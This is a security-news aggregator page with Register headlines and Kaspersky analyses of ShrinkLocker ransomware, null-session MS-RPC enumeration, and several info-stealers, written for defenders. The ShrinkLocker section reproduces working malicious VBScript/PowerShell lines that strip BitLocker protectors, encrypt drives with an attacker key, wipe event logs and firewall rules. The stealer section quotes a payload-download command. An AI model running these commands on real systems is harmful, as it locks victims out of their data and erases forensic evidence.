Viry a Červi

Three-year-old Apache Flink flaw under active attack

The Register - Anti-Virus - 24 Květen, 2024 - 02:59
We know IT admins have busy schedules but c'mon

An improper access control bug in Apache Flink that was fixed in January 2021 has been added to the US government's Known Exploited Vulnerabilities Catalog, meaning criminals are right now abusing the flaw in the wild to compromise targets.…

Kategorie: Viry a Červi

Here's yet more ransomware using BitLocker against Microsoft's own users

The Register - Anti-Virus - 23 Květen, 2024 - 23:21
ShrinkLocker throws steel and vaccine makers into the hurt locker

Updated  Yet more ransomware is using Microsoft BitLocker to encrypt corporate files, steal the decryption key, and then extort a payment from victim organizations, according to Kaspersky.…

Kategorie: Viry a Červi

Casino cyberattacks put a bullseye on Scattered Spider – and the FBI is closing in

The Register - Anti-Virus - 23 Květen, 2024 - 22:16
Mandiant CTO chats to The Reg about the looming fate of this ransomware crew

Interview  The cyberattacks against Las Vegas casinos over the summer put a big target on the backs of prime suspects Scattered Spider, according to Mandiant CTO Charles Carmakal.…

Kategorie: Viry a Červi

Google guru roasts useless phishing tests, calls for fire drill-style overhaul

The Register - Anti-Virus - 23 Květen, 2024 - 21:01
Current approaches aren't working and demonize security teams

A Google security bigwig has had enough of federally mandated phishing tests, saying they make colleagues hate IT teams for no added benefit.…

Kategorie: Viry a Červi

Veeam says critical flaw can't be abused to trash backups

The Register - Anti-Virus - 23 Květen, 2024 - 16:30
It's still a rough one, so patch up

Veeam says the recent critical vulnerability in its Backup Enterprise Manager (VBEM) can't be used by cybercriminals to delete an organization's backups.…

Kategorie: Viry a Červi

70% of CISOs worry their org is at risk of a material cyber attack

The Register - Anti-Virus - 23 Květen, 2024 - 15:30
Wait, why do you want this job again?

Chief information security officers around the globe "are nervously looking over the horizon," according to a survey of 1,600 CISOs that found more than two thirds (70 percent) worry their organization is at risk of a material cyber attack over the next 12 months. …

Kategorie: Viry a Červi

ShrinkLocker: Turning BitLocker into ransomware

Kaspersky Securelist - 23 Květen, 2024 - 14:00


Attackers always find creative ways to bypass defensive features and accomplish their goals. This can be done with packers, crypters, and code obfuscation. However, one of the best ways of evading detection, as well as maximizing compatibility, is to use the operating system’s own features. In the context of ransomware threats, one notable example is leveraging exported functions present in the cryptography DLL ADVAPI32.dll, such as CryptAcquireContextA, CryptEncrypt, and CryptDecrypt. In this way, the adversaries can make sure that the malware can run and simulate normal behavior in various versions of the OS that support this DLL.

Although this seems smart enough, another clever technique caught our attention in a recent incident response engagement: using the native BitLocker feature to encrypt entire volumes and stealing the decryption key. The original purpose of BitLocker is to address the risks of data theft or exposure from lost, stolen, or improperly decommissioned devices. Nonetheless, threat actors have found out that this mechanism can be repurposed for malicious ends to great effect.

In that incident, the attackers were able to deploy and run an advanced VBS script that took advantage of BitLocker for unauthorized file encryption. We spotted this script and its modified versions in Mexico, Indonesia, and Jordan. In the sections below, we analyze in detail the malicious code obtained during our incident response effort and provide tips for mitigating this kind of threat.

This is not the first time we have seen BitLocker used for encrypting drives and demanding a ransom. Previously, attackers used this Microsoft utility to encrypt critical systems after accessing and controlling these. In this case, however, the adversary took additional steps to maximize the damage from the attack and hinder an effective response to the incident.

VBScript analysis

One interesting fact is that the attackers did not bother to obfuscate the bulk of the code, as threat actors typically do. The most plausible explanation for this is that they already had full control of the target system when the script was executed. It is stored at C:\ProgramData\Microsoft\Windows\Templates\ as Disk.vbs. Its first lines contain a function that converts a string to its binary representation using an ADODB.Stream object. This function is later used for encoding data to be sent in an HTTP POST request.

Stream_StringToBinary function

The first step by the main function of the script is to use Windows Management Instrumentation (WMI) to query information about the operating system with the help of the Win32_OperatingSystem class. For each object within the query results, the script checks if the current domain is different from the target. If it is, the script finishes automatically. After that, it checks if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”, and if the Windows version matches any one of these, the script finishes automatically and deletes itself.

Initial conditions for execution

After that, the script continues to rely on WMI for querying information about the OS. It then performs disk resizing operations, which may vary with the result of the OS version check. These operations are performed solely on fixed drives (DriveType = 3). The following drive types typically exist in a file system:

$DriveType_map = @{ 0 = 'Unknown' 1 = 'No Root Directory' 2 = 'Removable Disk' 3 = 'Local Disk'  This is the DriveType searched by the malware. 4 = 'Network Drive' 5 = 'Compact Disc' 6 = 'RAM Disk' }

The likely reason the malware does not try to perform same operations on network drives (DriveType = 4) is to avoid triggering detection tools on the network.

To resize local drives in Windows Server 2008 or 2012, the script checks the primary boot partition and saves this information. It saves the index of the different partitions and then performs the following actions using diskpart:

  • Shrink the size of each non-boot partition by 100 MB. This creates 100 MB in unallocated space in each partition other than the boot volume;
  • Split the unallocated space into new 100 MB primary partitions;
  • Format the partitions with the override option, which forces the volume to dismount first if necessary, and assigns a file system and a drive letter to each;
  • Activate the partitions;
  • If the shrink procedure was successful, save “ok” as a variable, so the script can continue.

Disk resizing operations performed by the script in Windows Server 2008 and 2012

If the operation is successful, the code uses the utility bcdboot and the drive letter saved previously as a boot volume to reinstall the boot files on the new primary partitions.

Boot files reinstall

The partition shrink operations for other OS versions are similar but implemented with a different piece of code for compatibility reasons. The example below shows the process as applied to the Windows versions 7, 8, and 8.1.

Disk resizing operations in the Windows versions 7, 8, or 8.1

For Windows 2008 or 7, after the partition shrink procedure finishes, the variable matchedDrives saves the drive letters separated by commas, but only if the file system is NFTS, exFAT, FAT32, ReFS, or FAT. The code was modified to print an example:

matchedDrives variable data

The script then adds the following registry entries:

  • fDenyTSConnections = 1: disables RDP connections;
  • scforceoption = 1: enforces smart card authentication;
  • UseAdvancedStartup = 1: requires the use of the BitLocker PIN for pre-boot authentication;
  • EnableBDEWithNoTPM = 1: allows BitLocker without a compatible TPM chip;
  • UseTPM = 2: allows the use of TPM if available;
  • UseTPMPIN = 2: allows the use of a startup PIN with TPM if available;
  • UseTPMKey = 2: allows the use of a startup key with TPM if available;
  • UseTPMKeyPIN = 2: allows the use of a startup key and PIN with TPM if available;
  • EnableNonTPM = 1: allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive;
  • UsePartialEncryptionKey = 2: requires the use of a startup key with TPM;
  • UsePIN = 2: requires the use of a startup PIN with TPM.

If the script detects an error, it restarts the system.

Registry modifications

By analyzing the malware dynamically, we can confirm the registry changes performed:

HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKey: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001 HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePIN: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseAdvancedStartup: 0x00000001 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableBDEWithNoTPM: 0x00000001 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPM: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKey: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePIN: 0x00000002

Interestingly enough, there are several functions performing these operations, each designed for a different version of Windows. In some conditionals, it checks if BitLocker Drive Encryption Tools are active through the ID 266 of Remote Server Administration Tools. The malware then checks if the BitLocker Drive Encryption Service (BDESVC) is running. If not, it starts the service.

BDESVC verification

The script also changes the label of the new boot partitions to the attacker’s email as shown in the images below, so the victim can contact them.

Drive label modification

Attacker’s email as a drive label

After that, the malware disables the protectors used to secure BitLocker’s encryption key and deletes them. The deletion method may vary depending on the version of the OS. In a Windows Server 2008 or Windows 7 scenario, this is accomplished via VBS features, after which the script uses PowerShell to force the deletion of the protectors.

Having completed the deletion, it enables the use of a numerical password as a protector and the encryption feature.

Protectors deletion

The reason for deleting the default protectors is to avoid the recovery of the keys by the user, as in the example below.

The recovery of BitLocker keys

As the next step, the 64-character encryption key is generated by the malware using a random multiplication and replacement of the following elements:

  • A variable with the numbers 0–9;
  • The famous pangram, “The quick brown fox jumps over the lazy dog”, in lowercase and uppercase, which contains every letter of the English alphabet;
  • Special characters.

The randomness of this password is accomplished by a seed made of various elements of the affected system, such as used memory and network statistics. Later, this information is sent to the attacker. We tested the key generation logic in our environment, and with a slight modification of the script, we were able to see the generated password.

Key generation process

The code then converts the previously generated encryption key to a secure string—a PowerShell option that prevents creating a string object in memory—and effectively enables BitLocker on the drives.

If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command ""$protectors = (Get-BitLockerVolume -MountPoint " & drives(i) & ").KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint " & drives(i) & " -KeyProtectorId $protector.KeyProtectorId } }""")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command $a=ConvertTo-SecureString " & Chr(34) & Chr(39) & strRandom & Chr(39) & Chr(34) & " -asplaintext -force;Enable-BitLocker " & drives(i) & " -s -qe -pwp -pw $a")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command Resume-BitLocker -MountPoint " & drives(i) & " ")).stdout.readall) > 0 Then: End If

The script then creates an HTTP POST request object using the following options:

  • Use WinHTTP version 5.1.
  • Accept the French language.
  • Ignore SSL errors (httpRequest.Option(4) = 13056 à WinHttpRequestOption_SslErrorIgnoreFlags).
  • Disable redirects (httpRequest.Option(6) = false à WinHttpRequestOption_EnableRedirects).

The attackers used the domain to obfuscate their real address. This domain is legitimate, it belongs to CloudFlare and is used to provide quick tunnels for developers. The subdomain configured by the attackers was scottish-agreement-laundry-further.

Request creation

The malware also includes information about the machine and the generated password as a payload for the POST request, as shown in the image below.

Information to be sent in the POST request

The script also contains a loop that tries to send the information to the attacker five times if an error occurs.

Retry procedure

With some tweaks, we were able to print the data being sent to the attacker, as shown in the image below. Note that the data includes the computer name, Windows version, drives affected, and the password string. Consequently, the victim’s IP address will also be logged on the attacker’s server, allowing them to track each victim.

Information to be sent

After removing the BitLocker protectors and configuring drive encryption, the script goes through the following steps to cover its tracks.

It validates if the hostname is the target of this malware, then deletes the files:

  • \Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
  • \scripts\Login.vbs
  • \scripts\Disk.vbs
  • C:\ProgramData\Microsoft\Windows\Templates\Disk.vbs

Delete operations

The script then clears the Windows PowerShell and Microsoft-Windows-PowerShell/Operational logs with wevtutil. It turns on the system firewall and deletes all of its rules. It also deletes the tasks VolumeInit and VolumeCheck. Finally, the malware performs a forced shutdown.

If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Windows PowerShell""")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Microsoft-Windows-PowerShell/Operational""")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall set allprofiles state on")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall firewall delet rule name=all")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeInit"" /F")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeCheck"" /F")).stdout.readall) > 0 Then: End If

After the shutdown, the victim will see the BitLocker screen. If the user tries to use the recovery options, they will see nothing but the message, “There are no more BitLocker recovery options on your PC”.

BitLocker recovery screen

Tactics, techniques and procedures

The analysis showed that this threat actor has an extensive understanding of the VBScript language, and Windows internals and utilities, such as WMI, diskpart, and bcdboot. Below are the TTPs identified for this scenario.

Tactic Technique ID Execution Command and Scripting Interpreter: Visual Basic T1059.005 Execution Windows Management Instrumentation T1047 Execution Command and Scripting Interpreter: PowerShell T1059.001 Impact Data Encrypted for Impact T1486 Impact System Shutdown/Reboot T1529 Defense evasion Clear Windows Event Logs T1070.001 Defense evasion Modify Registry T1112 Defense Evasion Disable or Modify System Firewall T1562.004 Exfiltration Exfiltration Over Web Service T1041 Artifacts and digital forensics

As the local activity performed by the script includes cleaning up its traces, clearing some logs and the tasks created for execution, and finally, encrypting the whole drive, it was not easy to get forensic artifacts to identify the malicious activities and to find opportunities for decryption.

Fortunately, some of the script content and commands executed were registered and logged by a third-party service, and these were collected for analysis. This allowed us to obtain the secure strings to which the encryption keys were converted from some of the affected systems.

Secure strings obtained

Elsewhere, we attempted to collect network logs where the POST requests to the C2 were stored. However, the most common configuration for web activity logging includes GET but unfortunately not POST requests.

We did finally obtain the POST requests, but this was very challenging. The case provides justification for logging POST traffic and ensuring that all critical system activity is forwarded to a central repository with enough space for storing data for the recommended retention period (six or more months) to avoid losing evidence after attackers remove all their traces from the individual systems.

Finally, some systems in the customer’s infrastructure remained unencrypted and were considered unaffected at first. However, we later found out that they had, in fact, been affected, but BitLocker was not configured in these systems. This made it possible for us to obtain the script itself, analyze its behavior and collect further evidence.


While we could obtain some of the passphrases and fixed values implemented by the threat actor to create the encryption keys, the script includes some variable values and those are different for each single affected system, making the decryption process difficult.

Network information collected for use in the seed


Companies are encouraged to use BitLocker or other encryption tools (such as VeraCrypt) to protect corporate secrets. However, a few precautions must be taken to avoid the abuse by attackers.

  • Use robust, properly configured EPP solution to detect threats that try to abuse BitLocker;
  • Implement Managed Detection and Response (MDR) to proactively scan for threats;
  • If BitLocker is enabled, make sure you are using a strong password and have the recovery keys stored in a secure location;
  • Ensure that users have only minimal privileges. This way, they cannot enable encryption features or change registry keys on their own;
  • Enable network traffic logging and monitoring. Configure the logging of both GET and POST requests. In case of infection, the requests made to the attacker’s domain may contain passwords or keys;
  • Monitor for events associated with VBS execution and PowerShell, and save the logged scripts and commands to an external repository storing activity that may be deleted locally;
  • Make backups frequently, store them offline, and test them.

If you need assistance with investigation of a ransomware attack and recovering encrypted data, please contact us at [email protected].


Our incident response and malware analysis are evidence that attackers are constantly refining their tactics to evade detection. In this incident, we observed the abuse of the native BitLocker feature for unauthorized data encryption. The VBS script demonstrates that the malicious actor involved in this attack have an excellent understanding of Windows internals. Although the script analysis was not complicated at all, this kind of threat is difficult to detect, since unique strings inside the artifact can be easily modified to bypass YARA rules. Therefore, the best detection method in scenarios like these is behavioral analysis, which correlates different actions performed by the application to reach a verdict.

Kaspersky products detect the threat described in this article with the following verdicts:

  • Trojan.VBS.SAgent.gen;
  • Trojan-Ransom.VBS.BitLock.gen;
  • Trojan.Win32.Generic.
Indicators of compromise


E-mail addresses:

MD5 hashes:

A journey into forgotten Null Session and MS-RPC interfaces

Kaspersky Securelist - 23 Květen, 2024 - 11:00

A journey into forgotten Null Session and MS-RPC interfaces (PDF)

It has been almost 24 years since the null session vulnerability was discovered. Back then, it was possible to access SMB named pipes using empty credentials and collect domain information. Most often, attackers leveraged null sessions for gathering domain users through techniques such as RID (Relative Identifier) enumeration. RIDs uniquely identify users, groups, computers and other entities within the domain. To enumerate them, the attacker used MS-RPC interfaces to make some calls and collect information from the remote host.

To prevent such attacks, Microsoft restricted null session capabilities by limiting what an attacker can do after connecting to named pipes, and provided security policies that could be implemented to stop all null session activities. Today, although null sessions still exist and are enabled by default on domain controllers (most likely for compatibility purposes), most system administrators close this capability by hardening the security policies and monitoring domain controller activities, including anonymous access through SMB.

As penetration testers, we always pose the question: is it really as secure as it seems? In this case we asked if we can bypass policies and restrictions today, after 24 years, and bring the idea of anonymous access back to life. This research is tailored for security researchers and penetration testers seeking to enhance their understanding of MS-RPC interfaces and refine their research techniques. It’s important to note that all information in this article is intended for legitimate security research purposes only, and must not be used for illegal activities.

The research is divided into two parts. In this post we share the first part, devoted to the research methodology against MS-RPC interfaces, developed after observing some interesting behavior from one of the Windows interfaces. Also included is a discussion of how we can link this behavior to null sessions, and revive their legacy by enumerating information from the domain controller, specifically domain users without triggering any alerts.

About null session

Null sessions have emerged as a pivotal area of interest and concern within the field of cybersecurity. They occur when access to a network resource, most commonly the IPC$ “Windows Named Pipe” share, is granted with empty credentials. $IPC (Inter-Process Communication) is a hidden share that processes on different computers use to communicate with each other. After obtaining anonymous access to this resource, an attacker can bind an MS-RPC interface exposed by a particular named pipe inside the IPC$ share, and start to gather information such as shares, users, groups, registry keys and much more.

In newer Windows versions, the null session capability has become more restricted, and is available in Windows servers that act as domain controller only. When you upgrade your server to a domain controller, null session access to the following named pipes is available by default:

  • “\pipe\netlogon”;
  • “\pipe\samr”;
  • “\pipe\lsarpc”.

To prevent null sessions, two related system policies were introduced: “Restrict anonymous access to Named Pipes and Shares” and “Network access: Named Pipes that can be accessed anonymously.” The first policy, “Restrict anonymous access to Named Pipes and Shares,” is enabled by default. The second policy, “Network access: Named Pipes that can be accessed anonymously,” contains the three named pipes we discussed earlier (netlogon, samr, and lsarpc). To prevent any action related to null sessions, the latter policy is set to empty so that these named pipes can be accessed anonymously.

Enumerating network interfaces without authentication

During my work in traffic analysis, I noticed many packets related to DCOM communications between domain controller and other endpoints, which were tagged by Wireshark under the IOXIDResolver RPC interface and the ServerAlive2() method. The IOXIDResolver interface is actually the IObjectExporter interface. As Microsoft mentions, it is used for OXID resolution, pinging and server aliveness tests. In brief, it helps in the process of locating and connecting to remote objects involved in resolving OXID references to actual network locations (such as IP addresses) of objects in a DCOM environment.

One of the IObjectExporter methods is ServerAlive2. The ServerAlive2 (OPNUM 5) method was introduced with version 5.6 of the DCOM Remote Protocol, and extends the ServerAlive method. It returns string and security bindings for the object resolver, which allows the client to choose the most appropriate settings, compatible with both client and server. The IObjectExporter interface uses TCP port 135 as an MS-RPC endpoint.

In the traffic for each TCP stream related to DCOM communication, there were four packets. The first is related to binding the IObjectExporter interface, the second to the server binding response, the third to the ServerAlive2 function call, and the final packet is the response for the ServerAlive2 function, which contains all the network interfaces for the domain controller.

Bind request packet

The image above shows a bind request for IObjectExporter interface. You can see that the Auth Length header is equal to zero, indicating that the authentication level is None, and hence, there is no authentication. With just two packets from the client, we can enumerate network interfaces for the remote host without authentication.

The idea struck me: what if there are other RPC interfaces vulnerable to no authentication? What kind of enumeration could be obtained from them? Can we map it to the famous null session? And what research strategy should I follow to find this out? In the full version of the research (PDF), I try to answer these questions, discuss a new path for enumerating domain information, and share a tool that implements the idea of this new path.

UK data watchdog wants six figures from N Ireland cops after 2023 data leak

The Register - Anti-Virus - 23 Květen, 2024 - 10:30
Massive discount applied to save cop shop’s helicopter budget

Following a data leak that brought "tangible fear of threat to life", the UK's data protection watchdog says it intends to fine the Police Service of Northern Ireland (PSNI) £750,000 ($955,798).…

Kategorie: Viry a Červi

How Apple Wi-Fi Positioning System can be abused to track people around the globe

The Register - Anti-Virus - 23 Květen, 2024 - 08:34
SpaceX is smart on this, Cupertino and GL.iNet not so much

In-depth  Academics have shown how Apple's Wi-Fi Positioning System (WPS) can be abused to create a global privacy nightmare.…

Kategorie: Viry a Červi

Would you buy Pegasus spyware from this scammer?

The Register - Anti-Virus - 23 Květen, 2024 - 07:45
You shouldn't – Indian infosec researchers warn you'll get random junk instead

Indian infosec firm CloudSEK warned on Wednesday that scammers are selling counterfeit code advertised as the NSO Group's notorious Pegasus spyware.…

Kategorie: Viry a Červi

'China-aligned' spyware slingers operating since 2018 unmasked at last

The Register - Anti-Virus - 23 Květen, 2024 - 05:47
Unfading Sea Haze adept at staying under the radar

Bitdefender says it has tracked down and exposed an online gang that has been operating since 2018 nearly without a trace – and likely working for Chinese interests.…

Kategorie: Viry a Červi

Lawmakers advance bill to tighten White House grip on AI model exports

The Register - Anti-Virus - 23 Květen, 2024 - 02:16
Vague ML definitions subject to change – yeah, great

The House Foreign Affairs Committee voted Wednesday to advance a law bill expanding the White House's authority to police exports of AI systems – including models said to pose a national security threat to the United States.…

Kategorie: Viry a Červi

Go after UnitedHealth, not us, 100+ medical groups urge Uncle Sam

The Register - Anti-Virus - 23 Květen, 2024 - 00:05
Why should we get its paperwork?

More than 100 medical industry groups have asked the Feds to make UnitedHealth Group, not them, go through the rigmarole of notifying everyone about the Change Healthcare ransomware infection.…

Kategorie: Viry a Červi

Canada's London Drugs confirms ransomware attack after LockBit demands $25M

The Register - Anti-Virus - 22 Květen, 2024 - 22:00
Pharmacy says it's 'unwilling and unable to pay ransom'

Canadian pharmacy chain London Drugs has confirmed that ransomware thugs stole some of its corporate files containing employee information and says it is "unwilling and unable to pay ransom to these cybercriminals."…

Kategorie: Viry a Červi

NYSE parent gets $10M wrist tap for failing to report 2021 systems break-in

The Register - Anti-Virus - 22 Květen, 2024 - 21:30
Intercontinental Exchange's Q1 revenue exceeded $1B – that'll sure teach 'em

The New York Stock Exchange's parent company has just been hit with a $10 million fine for failing to properly inform the Securities and Exchange Commission (SEC) of a 2021 cyber intrusion. …

Kategorie: Viry a Červi

Laundering cash from healthcare, romance scams lands US man in prison for a decade

The Register - Anti-Virus - 22 Květen, 2024 - 20:00
$4.5M slushed through accounts from state healthcare and lonely people

Georgia resident Malachi Mullings received a decade-long sentence for laundering money scored in scams against healthcare providers, private companies, and individuals to the tune of $4.5 million.…

Kategorie: Viry a Červi

Confused by the SEC's IT security breach reporting rules? Read this

The Register - Anti-Virus - 22 Květen, 2024 - 18:30
'Clarification' weighs in on material vs voluntary disclosures

The US Securities and Exchange Commission (SEC) wants to clarify guidelines for public companies regarding the disclosure of ransomware and other cybersecurity incidents.…

Kategorie: Viry a Červi

Stopping ransomware in multicloud environments

The Register - Anti-Virus - 22 Květen, 2024 - 17:03
Attend this Register live event to learn how

Sponsored Survey and Live Event  What are the biggest risks to your organization posed by ransomware and what security defenses does it have in place to protect its sensitive data from cyber criminals?…

Kategorie: Viry a Červi

Stealers, stealers and more stealers

Kaspersky Securelist - 22 Květen, 2024 - 12:00


Stealers are a prominent threat in the malware landscape. Over the past year we published our research into several stealers (see here, here and here), and for now, the trend seems to persist. In the past months, we wrote several private reports on stealers as we discovered Acrid (a new stealer), ScarletStealer (another new stealer) and Sys01, which had been updated quite a bit since the previous public analysis.

To learn more about our crimeware reporting service, you can contact us at [email protected].


Acrid is a new stealer found last December. Despite the name, it has nothing in common with the AcridRain stealer. Acrid is written in C++ for the 32-bit system, despite the fact that most systems are 64 bit these days. Upon closer inspection of the malware, the reason for compiling for a 32-bit environment became clear: the author decided to use the “Heaven’s Gate” technique. This allows 32-bit applications to access the 64-bit space to bypass certain security controls.

“Heaven’s Gate” technique implementation in Acrid stealer

In terms of functionality, the malware embeds the typical functionality one might expect from a stealer:

  • Stealing browser data (cookies, passwords, login data, credit card information, etc.);
  • Stealing local cryptocurrency wallets;
  • Stealing files with specific names (e.g. wallet.dat, password.docx, etc.);
  • Stealing credentials from installed applications (FTP managers, messengers, etc.).

Collected data is zipped and sent to the C2.

The malware is of medium sophistication. It has a certain degree of complexity, such as string encryption, but lacks any innovative features.


Last January, we analyzed a downloader we dubbed “Penguish”, which we described in detail in a private report. One of the payloads it downloaded was a previously unknown stealer we call “ScarletStealer”.

ScarletStealer is a rather odd stealer as most of its stealing functionality is contained in other binaries (applications and Chrome extensions) that it downloads. To be more precise, when ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by checking certain folder paths (e.g. %APPDATA%\Roaming\Exodus). If anything is detected, it starts to download the additional executables using the following PowerShell command:

powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' - OutFile $env:APPDATA\\.........exe

Among the binaries it downloads are metaver_.exe (used to steal content from Chrome extensions), meta.exe (modifies the Chrome shortcut, so the browser is launched with a malicious extension), and others. Most of the ScarletStealer executables are digitally signed.

Metamask grabbing function

The stealer is very underdeveloped in terms of functionality and contains many errors, flaws and redundant code. For example, the malware tries to gain persistence on the system by creating a registry key for autorun. The registry key contains the path to the file Runtimebroker_.exe, but we did not find any code in any of the files involved in the infection that would store at least one executable file with that name.

Therefore, it is rather odd that this stealer is distributed through a long chain of downloaders, where the last one is the Penguish downloader, and signed with a digital certificate. One would expect that all this effort would result in a more advanced stealer than ScarletStealer.

ScarletStealer victims are mostly located in Brazil, Turkey, Indonesia, Algeria, Egypt, India, Vietnam, the USA, South Africa and Portugal.


SYS01 (also known as “Album Stealer” or “S1deload Stealer”) is a relatively unknown stealer that has been around since at least 2022. It has been described by Bitdefender, Zscaler and Morphisec. In their reports, you can follow its evolution from a C# stealer to a PHP stealer. When we started to look into this campaign we noticed a combination of the two, a C# and PHP payload.

One thing that has not changed is the infection vector. Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page:

Ad for the malicious ZIP archive on a compromised facebook page

The archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll. The DLL opens an adult-themed video and executes the next payload, which is a malicious PHP file encoded with ionCube.

The executed PHP file calls a script, install.bat, which ultimately runs the next stage by executing a PowerShell command. This layer is conveniently named runalayer and runs what seems to be the final payload called Newb.

There is, however, a difference between the latest version of the stealer and the previous publicly disclosed versions, which consists in the split of functionality. The stealer as it is now (Newb), contains functionality to steal Facebook-related data and to send stolen browser data, located and organized in a specific directory structure to the C2. It also has backdoor functions, and it can execute the following commands, among others:

Command Description dll Download file, kill all the specified processes and start a new process using PowerShell (the command decrypts, unzips and executes the specified file). The PowerShell routine is similar to the routines observed earlier. cmd Kill a list of specified processes and start a new process. dls Download a file, kill all the specified processes and start a new specified process.

But the code that actually collects the browser data Newb sends to C2 was found in a different sample named imageclass. We were not able to determine with 100% certainty how imageclass was pushed to the system, but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine.

The initial ZIP archive also contains another malicious PHP file: include.php. This file has similar backdoor functionality to Newb and accepts many of the same commands in the same format.

Victims of this campaign were found all over the world, but most of them were located in Algeria (a bit over 15%). This most likely has to do with the infection vector as it can be heavily localized. We also noticed that the malware authors have a preference for .top TLDs.


Stealers are a prominent threat that is here to stay. In this post, we have discussed an evolution of a known stealer, as well as two completely new stealers with different levels of complexity. The fact that new stealers appear every now and then, combined with the fact that their functionality and sophistication varies greatly, indicates that there is a criminal market demand for stealers.

The danger posed by stealers lies in the consequences. This malware steals passwords and other sensitive information, which later can be used for further malicious activities causing great financial losses among other things. To protect yourself against stealers and other threats, it is essential to follow a number of basic hygiene rules. Always update your software with the latest security patches, don’t download any files from dubious sources, don’t open attachments in suspicious emails, etc. Finally, if you want to be even more sure, a security solution, such as our SystemWatcher component, that looks at the behavior of events on your machine can help to protect your system as well.

If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at [email protected].

Indicators of compromise




Syndikovat obsah